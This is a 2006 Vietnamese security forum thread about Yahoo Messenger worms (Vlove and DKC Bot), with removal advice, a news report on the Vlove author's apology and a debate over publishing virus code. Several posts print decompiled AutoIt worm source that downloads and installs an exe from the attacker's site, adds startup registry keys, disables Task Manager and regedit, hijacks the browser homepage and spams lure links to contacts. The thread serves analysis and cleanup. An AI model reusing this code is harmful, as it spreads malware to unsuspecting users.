| [Question] Một virus qua YIM mới vừa xuất hiện |
02/08/2006 08:44:33 (+0700) | #1 | 11799 |
mfeng
Researcher
|
Joined: 29/10/2004 15:16:29
Messages: 243
Offline
|
|
Title: Một virus qua YIM mới vừa xuất hiện.
Chiều tối nay vừa bật YIM lên đã gặp một loạt thông điệp dạng:
http://fun.nguoiiu.com/life/ Tang ban ne 
etc...
Đoán 90% là một kiểu YIM worm mới, vì có hành vi rất giống với AutoIt.Gaixinh.
Mở theo cái link trên, save được một file exe vlove.exe. Qua phân tích, kết quả cho thấy đây là một dạng "hậu duệ" của Gaixinh  Có lẽ chú script-kiddies nào mang code gaixinh về sửa đổi.
Sau đây là một đoạn code
Code:
; <AUT2EXE VERSION: 3.1.1.0>
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: E:\VICTORY's Documents\ICON\New Icon\vlove.au3>
; ----------------------------------------------------------------------------
AutoItSetOption ("TrayIconHide","1")
AutoItSetOption ("WinTitleMatchMode", "4")
AutoItWinSetTitle ("MTVCSTART")
While WinExists("MTVCLOVE")
WinClose("MTVCLOVE")
WEnd
AutoItWinSetTitle ("MTVCLOVE")
Sleep(5000)
; Phan chinh
Dim $mess[5]
Dim $dfmess[5]
If Not FileExists(@WindowsDir & "\system32.exe") Then
InetGet ("http://fun.nguoiiu.com/y/vlove.exe" ,@WindowsDir & "\system32.exe")
Sleep(10000)
EndIf
; Tao tin nhan
$dfmess[0] = " http://fun.nguoiiu.com/life/  Vui qua ne "
$dfmess[1] = " http://fun.nguoiiu.com/life/ Truyen cuoi do, vao di =)) "
$dfmess[2] = " http://fun.nguoiiu.com/life/ Tang ban ne =)) "
$dfmess[3] = " http://fun.nguoiiu.com/life/ =)) vao day nhe! Chuc vui ve!"
$dfmess[4] = " http://fun.nguoiiu.com/life/ haaaaa =)) =)) Trui, ngo nghinh wa' *-^"
InetGet ( "http://files.myopera.com/mtvcfun/files/messenger.txt" ,@TempDir & "\messenger.txt" ,1,1)
...
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","system32","REG_SZ", @WindowsDir & "\system32.exe")
RegWrite("HKEY_CURRENT_USER\SOFTWARE\microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", "http://fun.nguoiiu.com/life/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast","content url","REG_SZ", "http://fun.nguoiiu.com/y/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz","content url","REG_SZ", "http://fun.nguoiiu.com/y/")
...
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: E:\VICTORY's Documents\ICON\New Icon\vlove.au3>
; ----------------------------------------------------------------------------
Mình chỉ trích một số đoạn code cho đủ để hiểu cách remove virus này như thế nào.
Mô tả sơ lược
1. Các loại thông điệp gửi qua YIM như sau:
http://fun.nguoiiu.com/life/ Vui qua ne
http://fun.nguoiiu.com/life/ Truyen cuoi do, vao di
http://fun.nguoiiu.com/life/ Tang ban ne
http://fun.nguoiiu.com/life/ vao day nhe! Chuc vui ve!
http://fun.nguoiiu.com/life/ haaaaa Trui, ngo nghinh wa' *-^
2. Virus lấy file từ http://fun.nguoiiu.com/y/vlove.exe, ghi vào %Windows%\system32.exe
3. Tạo key run trong HKCU\Software\Microsoft\Windows\CurrentVersion\Run
system32 = %Windows%\system32.exe
4. Đặt lại homepage của IE:
HKCU\SOFTWARE\microsoft\Internet Explorer\Main
Start Page="http://fun.nguoiiu.com/life/"
5. Sửa key:
HKCU\Software\Yahoo\pager\View\YMSGR_Launchcast
content url = "http://fun.nguoiiu.com/y"
HKCU\Software\Yahoo\pager\View\YMSGR_buzz
content url="http://fun.nguoiiu.com/y/"
PS: Có thể việc public code gaixinh là nguyên nhân chủ yếu của sự vụ này
|
|
|
 |
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
02/08/2006 08:48:40 (+0700) | #2 | 11800 |
mfeng
Researcher
|
Joined: 29/10/2004 15:16:29
Messages: 243
Offline
|
|
Tới thời điểm hiện tại (7:40 01-08-2006), host trên đã bị disable:
Xin lỗi tới toàn thể người dùng Internet Việt Nam
Đây kô phải là 1 trang giải trí mà là 1 trang chứa virus
Webhost này là do tôi cho nhiều người bạn mượn, kô ngờ bị lợi dụng để phân tán virus
nếu bạn bị dính trojan này, xin hãy vào bkav.com.vn để cập nhật chương trình quét
|
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
02/08/2006 16:37:48 (+0700) | #3 | 11865 |
vinhphucict
Member
![[Minus]](/hvaonline/templates/viet/images/minus.gif "[Minus]") |
0 |
![[Plus]](/hvaonline/templates/viet/images/plus.gif "[Plus]")
|
|
Joined: 28/07/2006 04:30:08
Messages: 12
Offline
|
|
Không thể có chuyện mượn mõ ở đây!!!!!!!!!!!
Bất cẩn đến thế là cùng! Nhưng dù sao thì cũng đã xảy ra, lỗi trên có thể tha thứ!
Đã giải mã được rồi thì có thể remove nó đi được. Chú em này sinh 1987 hình như tại Hưng Yên, đang học tại Hà Nội. Bị tóm rồi!
Lần sau khi cho ai mượn cần tóm những thằng có tóc! |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
02/08/2006 22:44:02 (+0700) | #4 | 11939 |
![[Avatar]](/hvaonline/images/avatar/1d3afa33d7d4080fd143e3b31ab1121c.jpg "[Avatar]")
|
kara_men
Member
|
|
0 |
|
|
Joined: 27/06/2006 02:32:38
Messages: 91
Offline
|
|
Xin loi cac ban vi minh da phat tan virus nay!
Neu ban bi nhiem ban co the download chuong trinh nay de diet: http://fun.nguoiiu.com/delvlove.exe
Đã bị disable đâu
Hôm nay thằng bạn gửi cho cái này. Tò mò nhấn vào thử nhưng có thấy bị nhiễm gì đâu nhỉ?? Chắc tại mọi người không update windows đầy đủ rồi.
Nếu bạn nhận được các đường link http://fun.nguoiiu.com/life/ hoặc http://rev-club.info/life thì đừng vào. 2 trang web này hiện nay đang sử dụng mã độc để khống chế trình duyệt IE, chiếm trang chủ mặc định ( chuyển thành trang nguoiiu.com ), khoá regedit. msconfig ... Xin hãy gửi ngay thông báo này cho càng nhiều người càng tốt
|
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
04/08/2006 10:23:01 (+0700) | #5 | 12248 |
t0ny4n
Member
|
|
0 |
|
|
Joined: 03/07/2006 10:47:01
Messages: 40
Offline
|
|
Tin mới nè
Tác giả virus VLove đến VietNamNet "giải trình" sự việc
(VietNamNet) - "Do không lường trước hậu quả và nhận thức không đầy đủ, em đã dại dột tung virus Vlove lên mạng chỉ với mong muốn được nhiều người biết đến website của mình! Em muốn gửi lời xin lỗi đến toàn thể người dùng YM đã bị nhiễm Vlove và mong được tham gia khắc phục hậu quả bằng bất cứ cách nào!"
Nguyễn Đức D. thuật lại với phóng viên VietNamNet về quá trình phát tán Vlove qua YM trong vài ngày qua. Ảnh: Lê Anh Dũng
Với thái độ khá thành thực, Nguyễn Đức D. - Sinh năm 1987 - SV năm thứ nhất BachKhoa Aptech (Hà Nội) đã chủ động tự đến tòa soạn VietNamNet, với mong muốn được trình bày các vấn đề liên quan đến việc virus Vlove lây lan qua Yahoo Messenger tại VN trong vài ngày qua, cũng như gửi lời xin lỗi tới những người đã gặp phiền phức do máy tính bị nhiễm virus này.
"Đầu tiên, em xin nhờ VietNamNet chuyển lời xin lỗi của em đến tất cả người dùng YahooMessenger đã vô tình bị virus Vlove làm phiền" - D. nói.
D. kể lại khá chi tiết, trong đó nói rõ Vlove được D. viết rất đơn giản từ công cụ lập trình AutoIT, được tung lên mạng từ ngày 27/7/2006, lúc đầu tại trang Reved...info. Sau khi trang này bị hết băng thông (vì quá nhiều người cùng lúc truy cập vào), buộc phải tạm ngừng từ ngày 28/7, mãi cho đến chiều tối 31/7/2006 D. mới tung Vlove lên mạng một lần nữa tại domain http://...uoiiu.com.
Giải thích về các thông tin trên một số báo cho biết Vlove đã được chuẩn bị kỹ cho việc tấn công với tận 3 phiên bản khác nhau, D. cho rằng hiểu như vậy hơi "nghiêm trọng hoá vấn đề" quá: "Đúng là Vlove có ba phiên bản nhưng gần như giống hệt nhau, chỉ có điểm khác biệt là phiên bản đầu có thời gian gửi tin nhắn hàng loạt tới những người dùng YM khác trong friendlist với chu kỳ 1 phút. Em thấy gửi nhiều tin nhắn YM như thế gây ảnh hưởng nhiều tới người dùng nên sửa lại thành chu kỳ 30 phút. Phiên bản thứ 3 chỉ thay thao tác bôi đen (select) từng nick trong danh sách friendlist của YM trước khi kích chuột phải vào để gửi message hàng loạt thành thao tác Ctrl+A (các thao tác này đều được lập sẵn trong AutoIT) để không mất nhiều thời gian, khắc phục hiện tượng làm chương trình Yahoo Messenger chạy chậm".
Tác giả Vlove (bên trái): "Em muốn qua VietNamNet gửi lời xin lỗi đến toàn thể người dùng YM đã bị nhiễm virus Vlove" . Ảnh: Lê Anh Dũng
"Còn lại, tính năng của các phiên bản đều là gửi đường link đến trang web chứa virus, khi người dùng kích vào link, máy tính nào dùng trình duyệt IE (Internet Explorer) thấp hơn phiên bản 7.0 hoặc dùng hệ điều hành từ Windows XP SP1 trở về trước sẽ bị virus tự động cài đặt vào máy. Trường hợp còn lại, người dùng sẽ được hỏi có download file virus có đuôi .exe hay không".
D. cho biết: "Ngoài khả năng tự động chiếm địa chỉ trang chủ ngầm định của trình duyệt IE và gửi link tới tất cả các địa chỉ trong friendlist Yahoo của máy tính bị nhiễm, em xin khẳng định mục đích viết virus này của em không hề nhằm phá hoại gì đến người dùng máy tính."
D. cho biết thêm, ngay sau khi bạn bè gửi đường link về bài viết VietNamNet cảnh báo người dùng về sự phát tán của Vlove, cậu ta đã nhận ra rằng hành động của mình là rất dại dột và đã chủ động xóa ngay nguồn phát tán virus, viết chương trình xoá bỏ virus đó ra khỏi máy tính và xin lỗi trên website phát tán, chủ động liên hệ với trung tâm BKIS, đồng thời cung cấp mã nguồn và cách thức xóa Vlove... "Tuy nhiên, em không ngờ là nó vẫn lây lan nhanh như thế".
"Lúc đưa virus Vlove lên mạng, em chỉ nghĩ đơn giản đó là cách mà một số webmaster vẫn sử dụng để thu hút nhiều người biết đến website của mình, chứ chưa ý thức được rằng việc lợi dụng chương trình Yahoo Messenger để phát tán đường link tới website sẽ gây khó chịu và ảnh hưởng tới người sử dụng như hậu quả thực tế", D. giải thích.
Mới 19 tuổi, đang là sinh viên năm thứ nhất, D. thể hiện rõ sự hối hận và lo lắng khi chương trình Vlove của mình gây ra những tác hại không mong muốn tới cộng đồng Internet tại Việt Nam. Khi chủ động tới toà soạn VietNamNet trình bày sự việc vào chiều 2/8, D. đã phải rủ thêm một người bạn học đi cùng để đỡ ngại". Ảnh: Lê Anh Dũng
Một điểm đáng chú ý, tác giả Vlove khẳng định chương trình của mình không hề có khả năng tự động cập nhật các phiên bản mới từ máy người dùng bị nhiễm virus sau mỗi lần khởi động lại máy tính (như trong thông báo phân tích Vlove của BKIS). Trong thông báo này, BKIS cũng khẳng định "cả 3 phiên bản hiện tại của VloveYM không phá hoại hay ăn cắp dữ liệu của người dùng".
Tác giả một virus lây qua YM từng bị Bộ Bưu chính Viễn thông xử phạt hành chính 10 triệu đồng cách đây chưa lâu cũng đã chia sẻ với VietNamNet về Vlove: "Em hoàn toàn không biết tác giả Vlove là ai, song cảm thấy thương người này, vì em thấy đây là một bạn trẻ chưa có đủ nhận thức về trách nhiệm những hành vi của mình trên mạng hơn là đáng trách, vì Vlove chưa gây ra hậu quả gì nguy hiểm."
Qua vụ việc đáng tiếc của những "dịch virus YM nội" Xrobots hay Vlove, có thể thấy ý thức về bảo mật của đại đa số người dùng Internet tại Việt Nam còn rất thấp, và rất dễ "sập bẫy" với các đường link phát tán qua các chương trình chat như YM. Sự việc cũng gióng lên hồi chuông cảnh tỉnh với nhiều bạn trẻ đã và đang có ý định thử nghiệm, nghiên cứu virus vì nhiều mục đích: Hãy lường trước trách nhiệm của bản thân và hậu quả tới cộng đồng trước mỗi hành động của mình trên Internet. Đừng vì một phút bồng bột, muốn nổi danh mà có những sai lầm đáng tiếc. |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
05/08/2006 00:33:45 (+0700) | #6 | 12344 |
![[Avatar]](/hvaonline/images/avatar/dc2208f9bbd11486d5dbbb9218e03017.jpg "[Avatar]")
|
Luke
Elite Member
|
|
0 |
|
|
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
|
|
Code:
While(1)
sleep(60000)
$title = WinGetTitle("Yahoo! Messenger","")
$wincheck = WinExists ($title)
if $wincheck = 1 Then
$randnun = Random(0,4,1)
ClipPut($mess[$randnun])
BlockInput (1)
WinActivate($title)
Send("^m")
send("{DOWN}")
send("^{SHIFTDOWN}{END}{SHIFTUP}")
send("{ENTER}")
send("^v {ENTER}")
BlockInput (0)
EndIf Sleep(1400000)
WEnd
Nhìn đoạn này, Luke đoán vLove chỉnh lại từ xRobots. Nhưng kinh nghiệm lập trình của vLove khá hơn thằng em của Luke, dù sao thì nó cũng được đào tạo bài bản và già dặn hơn 1 thằng nhóc mới học lập trình được 2 tháng  |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
05/08/2006 12:49:47 (+0700) | #7 | 12476 |
![[Avatar]](/hvaonline/images/avatar/13a949b504127ae160ad59a646422962.jpg "[Avatar]")
|
jamesmr
Member
|
|
0 |
|
|
Joined: 03/03/2006 06:30:26
Messages: 153
Offline
|
|
light.phoenix wrote:
PS: Có thể việc public code gaixinh là nguyên nhân chủ yếu của sự vụ này
phát biểu linh tinh.ai làm nấy chịu ,a làm gì thì a tự chịu trách nhiệm lấy.còn việc post code theo tôi hoàn toàn là tốt,giúp chúng ta học hỏi được nhiều thứ,mà ở việt nam này toàn là dân giấu nghề kiếm được người post code cho xem hơi khó đấy a bạn. |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
05/08/2006 13:12:11 (+0700) | #8 | 12485 |
mfeng
Researcher
|
Joined: 29/10/2004 15:16:29
Messages: 243
Offline
|
|
Xin hỏi bạn học hỏi được gì từ đoạn code của xrobot kia? Kĩ năng lập trình mạng chăng? Hay lập trình hệ thống, hooking API, RCE...? Chỉ đơn giản là mấy lệnh script ghi registry, download file và send key không hơn không kém.
"Nghề" mà bạn đề cập đơn thuần chỉ có mục đích phá hoại, thích nổi danh mà thôi. |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
05/08/2006 23:24:27 (+0700) | #9 | 12525 |
114v
Member
|
|
0 |
|
|
Joined: 08/07/2006 23:27:00
Messages: 191
Offline
|
|
light.phoenix wrote:
Xin hỏi bạn học hỏi được gì từ đoạn code của xrobot kia? Kĩ năng lập trình mạng chăng? Hay lập trình hệ thống, hooking API, RCE...? Chỉ đơn giản là mấy lệnh script ghi registry, download file và send key không hơn không kém.
"Nghề" mà bạn đề cập đơn thuần chỉ có mục đích phá hoại, thích nổi danh mà thôi.
Nếu bạn thích thì bạn sẽ thấy có những cái gì đó  |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
06/08/2006 00:32:48 (+0700) | #10 | 12537 |
kaisai
Member
|
|
0 |
|
|
Joined: 08/07/2006 23:13:44
Messages: 8
Offline
|
|
@light.phoenix .
Biết đc phương pháp hoạt động của nó ra sao.Thế khi chưa công bố mã nó bác biết cách diệt nó không.Nếu bác là cao thủ có lẽ bác biết.Và theo em sau khi xem code gaixinh con Vlove diệt đc liền mà.Đấy là cái em nghiệm thu đc. |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
06/08/2006 05:44:32 (+0700) | #11 | 12587 |
|
jamesmr
Member
|
|
0 |
|
|
Joined: 03/03/2006 06:30:26
Messages: 153
Offline
|
|
light.phoenix wrote:
Xin hỏi bạn học hỏi được gì từ đoạn code của xrobot kia? Kĩ năng lập trình mạng chăng? Hay lập trình hệ thống, hooking API, RCE...? Chỉ đơn giản là mấy lệnh script ghi registry, download file và send key không hơn không kém.
.
sao lại là kĩ năng lập trình mạng :? ,đối với tui cái gì không biết mà đọc được của người khác thì tôi gọi là học ,đơn giản nhưng mà hiệu quả.
light.phoenix wrote:
"Nghề" mà bạn đề cập đơn thuần chỉ có mục đích phá hoại, thích nổi danh mà thôi.
cái này chắc anh bạn đã từng nhỉ,ba sạo |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
06/08/2006 21:19:56 (+0700) | #12 | 12723 |
|
Luke
Elite Member
|
|
0 |
|
|
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
|
|
light.phoenix wrote:
Xin hỏi bạn học hỏi được gì từ đoạn code của xrobot kia? Kĩ năng lập trình mạng chăng? Hay lập trình hệ thống, hooking API, RCE...? Chỉ đơn giản là mấy lệnh script ghi registry, download file và send key không hơn không kém.
"Nghề" mà bạn đề cập đơn thuần chỉ có mục đích phá hoại, thích nổi danh mà thôi.
light.phoenix nói thế là quá cực đoan. Theo mình nghĩ sau thời gian này cũng đã có thêm khá nhiều người biết đến AutoIT, một công cụ lập trình nhanh, gọn, gần gũi, và hiệu quả hơn mấy bộ Studio trong khá nhiều trường hợp. Và khả năng học lập trình AutoIT cao hơn nhiều so với Studios. Làm việc cốt hiệu quá chứ không cần quá màu mè hoa lá.
Hơn nữa, muốn bảo mật tốt thì phải hiểu về nó. Nếu light.phoenix bảo mật tốt thì cũng phải nghịch ngợm không ít rồi. Cái nguyên lý này tôi nghĩ bạn cũng phải hiều.
Nổi danh? Ai cũng có 1 cái uy tín của mình, đó cũng là danh tiếng. Tôi nghĩ bạn cũng sẽ không từ chối cái đó, thậm chí có thể còn thích nữa. Còn việc thích nổi danh theo kiểu này thì cũng cần phải xem xét lại, bởi vì chẳng ai thích mang tai tiếng vào người cả, chưa kể khoản tiền phạt méo mặt nữa chứ.
Tuy nhiên có 1 điều: NHIỆT TÌNH + THIẾU HIỂU BIẾT = PHÁ HOẠI + HẬU QUẢ |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
06/08/2006 23:39:23 (+0700) | #13 | 12743 |
mfeng
Researcher
|
Joined: 29/10/2004 15:16:29
Messages: 243
Offline
|
|
Hi Luke,
Cảm ơn bạn đã đưa ra một số ý kiến và nhận xét sâu sắc.
Hơn nữa, muốn bảo mật tốt thì phải hiểu về nó. Nếu light.phoenix bảo mật tốt thì cũng phải nghịch ngợm không ít rồi. Cái nguyên lý này tôi nghĩ bạn cũng phải hiều.
Mình cũng biết điều này. Muốn bảo vệ được cái gì phải thực sự nắm rõ về nó. Nhưng khái niệm "nghịch ngợm" làm sao không được ảnh hưởng tới người khác. Không phải vô cớ mà rất nhiều exploit code không thể sử dụng ngay theo kiểu nhắm mắt dùng của scriptkiddes. Theo rất nhiều đánh giá, thiệt hại do đám này gây ra không kém gì so với những tay chuyên nghiệp, thậm chí còn hơn.
Nổi danh? Ai cũng có 1 cái uy tín của mình, đó cũng là danh tiếng. Tôi nghĩ bạn cũng sẽ không từ chối cái đó, thậm chí có thể còn thích nữa. Còn việc thích nổi danh theo kiểu này thì cũng cần phải xem xét lại, bởi vì chẳng ai thích mang tai tiếng vào người cả, chưa kể khoản tiền phạt méo mặt nữa chứ.
Tuy nhiên có 1 điều: NHIỆT TÌNH + THIẾU HIỂU BIẾT = PHÁ HOẠI + HẬU Q
Con người nói chung thường hướng tới hai mục tiêu: vật chất và danh tiếng. Mình thừa nhận không nằm ngoài quy luật đó. Nhưng để đạt được các điều này bằng mọi cách thì không phải là điều hay. Nổi danh vì trình độ thực sự của bản thân, giúp ích cho cộng đồng luôn được kính trọng và ngưỡng mộ hơn nổi danh vì phá hoại, dù vô tình hay hữu ý.
Rega
|
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
07/08/2006 11:23:25 (+0700) | #14 | 12884 |
rankma
Member
|
|
0 |
|
|
Joined: 08/12/2005 03:23:22
Messages: 1
Offline
|
|
| Mình cũng đã bị nhiễm con Virus này, nhưng cũng đã khắc phục được qua những lời chỉ giáo của các bạn. Xin chân thành cảm ơn tất cả mọi người, |
|
|
|
|
| [Question] Re: Một virus qua YIM mới vừa xuất hiện |
02/09/2006 00:25:27 (+0700) | #15 | 19898 |
![[Avatar]](/hvaonline/images/avatar/a1556de466ecd65a7961698fcf6c9823.jpg "[Avatar]")
|
ducnamnv
Member
|
|
0 |
|
|
Joined: 22/09/2003 15:29:11
Messages: 55
Location: Đâu đó
Offline
|
|
Thành thật mà nói bác Luke đáng được biểu dương vì tinh thần nâng cao trình độ IT trong cộng đồng. Tui cũng rất may mắn khi thoát đc lần tấn công đầu tiên của gaixinh nhưng k biết làm cách nào giúp bạn bè gỡ nó ra, phải đến khi đọc xong bài của bác Luke tôi mới biết đc và nhắc nhở mọi ng đc chính xác.Nhờ bác luke mà tôi cũng hiểu đc AutoIt là công cụ tốt ntn. Mọi người đều phải chịu trách nhiệm trước những hành vi của mình, việc sử dụng và phát tán VR là do mỗi cá nhân, phải tự chịu & đừng quy kết trách nhiệm cho người khác.
Tuy nhiên các bác cho em hỏi là làm thế nào mọi người lại có được code của VR này, nếu mà phân tích được code từ file exe của nó thì chỉ bảo em với |
|
| Fan of LeVuHoang, conmale |
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
02/09/2006 02:29:22 (+0700) | #16 | 19948 |
nhutdm
Elite Member
|
|
0 |
|
|
Joined: 02/06/2003 12:40:50
Messages: 45
Offline
|
|
| Trong AutoIt có một công cụ hữu ích decompile *.exe thành script *.au3... Bạn có thể dùng cái đó để có mã nguồn nhưng trong một số trường hợp, coder có thể không cho phép bạn decompile hoặc đặt pass... |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
02/09/2006 12:41:45 (+0700) | #17 | 20116 |
|
Luke
Elite Member
|
|
0 |
|
|
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
|
|
Thường thì không thể decompile được vì tất cả những ai viết bằng AutoIT đều để chế độ un-decompile
Muốn reverse code của nó thì phải dùng đến upx.exe để unpack và tiếp đó là OllyDbg để disassemble nó, tìm phần mã nguồn đã được extract ra trong bộ nhớ
Có đầy đủ những gì cần |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
03/09/2006 05:05:52 (+0700) | #18 | 20218 |
vista
Member
|
|
0 |
|
|
Joined: 01/09/2006 21:03:55
Messages: 4
Offline
|
|
| Dạo này xuất hiện hàng loạt nhỉ? Cách đây 1 tiếng lại xuất hiện con daokhuc.de |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
03/09/2006 05:12:44 (+0700) | #19 | 20221 |
![[Avatar]](/hvaonline/images/avatar/12957c42d83ed46ae2904df4d5668f52.jpg "[Avatar]")
|
_HITMAN_
Member
|
|
0 |
|
|
Joined: 27/06/2006 01:36:31
Messages: 24
Offline
|
|
| Chính xác , tui mới bị nhiễm , may là ghost lại rồi , con này nếu bị nhiễm thì tên file được gọi trong lúc khởi động là takmng gì gì đó kho nhớ , vô run gõ msconfig chọn thẻ startup sẻ thấy nó , máy bị nhiễm nó cũng tự gữi đi cái link daokhuc.be cho tất cả mọi người trong list yahoo , nó disable task manager , ngoài ra nó còn thay đổi cả status là những lời yêu đương linh tinh kèm theo là cai link đó nửa . Mọi người cảnh giác ! |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
03/09/2006 06:28:40 (+0700) | #20 | 20232 |
mfeng
Researcher
|
Joined: 29/10/2004 15:16:29
Messages: 243
Offline
|
|
daokhuc.be ->
...
;--------------------------------------------
; Tac Gia: Kevin Duong - KVD
; Phan Mem: DKC Bot
; Phien Ban: 1.1
; Cong Dung: Quang cao Website thong qua Y!M
; Phat Hanh: 1-9-2006
;--------------------------------------------
...
$website = "http://daokhuc.be"
; Lay Nhiem Vao He Thong
If Not FileExists(@WindowsDir & "\taskmng.exe") Then
InetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1)
Sleep(5000)
EndIf
; Ghi Khoa Registry
RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Window Title", "REG_SZ", "Dao Khuc Community :: Chut gi de nho...")
...
Messages:
1. "Nguoi ra di vi anh da mang lam lo hay tai vi anh day qua ngheo? Chang the trao ve em duoc nhu long em luon uoc mo, giac mo giau sang... "
2. "Ngay khong em anh day lam sao cho het ngay? Sang dem duong nhu chi co anh voi anh quay quang... "
3. "Om bau dau thuong, minh anh co don chon day. Ngay mai em ra di, chon giau bao ky niem... "
4. "Dem nay mua ngoai hien, mua oi dung roi them cho xot xa. Anh khong quay ve day, loi nao anh noi da quen... "
5. "Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, cho quen mau cau yeu thuong em voi anh hom nao... " & "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... "
6. "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... "
7. "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... "
8. "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... "
9. "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau? "
! |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
03/09/2006 07:16:47 (+0700) | #21 | 20244 |
![[Avatar]](/hvaonline/images/avatar/a96604dd2ee67e119335c6083387c559.jpg "[Avatar]")
|
hung1910
HVA Friend
|
Joined: 06/09/2003 01:58:57
Messages: 123
Location: somewhere
Offline
|
|
KVD wrote:
Trong AutoIt có một công cụ hữu ích decompile *.exe thành script *.au3... Bạn có thể dùng cái đó để có mã nguồn nhưng trong một số trường hợp, coder có thể không cho phép bạn decompile hoặc đặt pass...
Cậu em coi chừng đó, chưa thấy mấy bài học trước hả? |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
03/09/2006 08:02:09 (+0700) | #22 | 20248 |
|
kara_men
Member
|
|
0 |
|
|
Joined: 27/06/2006 02:32:38
Messages: 91
Offline
|
|
| http://daokhuc.be/ Cái này lây qua lỗi gì vậy?? Sau tui vào mà ko thấy có ảnh hưởng gì? |
|
|
|
|
| [Question] Một virus qua YIM mới vừa xuất hiện |
03/09/2006 08:15:03 (+0700) | #23 | 20249 |
|
_HITMAN_
Member
|
|
0 |
|
|
Joined: 27/06/2006 01:36:31
Messages: 24
Offline
|
|
| Ông cứ chờ 1 hồi thì sẻ biết , nó tự thay đổi status với tự gữi link cho mọi người trong list đó , kiểm tra xem các tin đã gữi coi , vô task manager có được ko ? ! |
|
|
|
|
| [Question] Re: Một virus qua YIM mới vừa xuất hiện |
03/09/2006 08:31:45 (+0700) | #24 | 20251 |
![[Avatar]](/hvaonline/images/avatar/ee7385afc15c65e5e65d06823ddf6160.png "[Avatar]")
|
TuanHung91
Member
|
|
0 |
|
|
Joined: 11/08/2006 19:39:03
Messages: 15
Location: Hà Nội
Offline
|
|
Sao bây giờ lắm Vius lây lan qua Y!M thế nhỉ????
Cũng là đòn cảnh tỉnh cho các người dùng ở Việt Nam!!!!! ) ) |
|
|
|
|
| [Question] Re: Một virus qua YIM mới vừa xuất hiện |
03/09/2006 08:58:41 (+0700) | #25 | 20257 |
netprobienhoa
Member
|
|
0 |
|
|
Joined: 14/08/2006 14:45:43
Messages: 5
Offline
|
|
| Đồng chí phoenix cho hỏi làm sao để kill con vius này đây? Con này mới quá, chưa có sòt nào kill dc, có ai chỉ cách kill bằng tay ko? |
|
|
|
|
| [Question] Re: Một virus qua YIM mới vừa xuất hiện |
03/09/2006 09:08:23 (+0700) | #26 | 20258 |
|
hung1910
HVA Friend
|
Joined: 06/09/2003 01:58:57
Messages: 123
Location: somewhere
Offline
|
|
Vào registry xoá hết :
RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website)
